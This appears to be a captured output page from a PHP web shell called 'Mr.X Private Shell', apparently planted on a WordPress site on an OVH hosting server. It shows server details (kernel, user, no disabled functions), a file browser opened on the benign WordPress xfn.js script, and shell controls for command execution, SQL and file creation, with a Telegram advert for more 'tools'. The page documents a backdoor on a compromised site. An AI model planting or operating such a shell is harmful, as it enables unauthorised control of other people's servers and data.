Uname: Linux webm005.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: 6036 (villadal)
Group: 100 (users)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/villadal/www/old/////wp-admin/js/      ( Reset | Go to )
File Name: xfn.js
Edit
/**
 * Generates the XHTML Friends Network 'rel' string from the inputs.
 *
 * @deprecated 3.5.0
 * @output wp-admin/js/xfn.js
 */
jQuery( function( $ ) {
    $( '#link_rel' ).prop( 'readonly', true );
    $( '#linkxfndiv input' ).on( 'click keyup', function() {
        var isMe = $( '#me' ).is( ':checked' ), inputs = '';
        $( 'input.valinp' ).each( function() {
            if ( isMe ) {
                $( this ).prop( 'disabled', true ).parent().addClass( 'disabled' );
            } else {
                $( this ).removeAttr( 'disabled' ).parent().removeClass( 'disabled' );
                if ( $( this ).is( ':checked' ) && $( this ).val() !== '') {
                    inputs += $( this ).val() + ' ';
                }
            }
        });
        $( '#link_rel' ).val( ( isMe ) ? 'me' : inputs.substr( 0,inputs.length - 1 ) );
    });
});

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL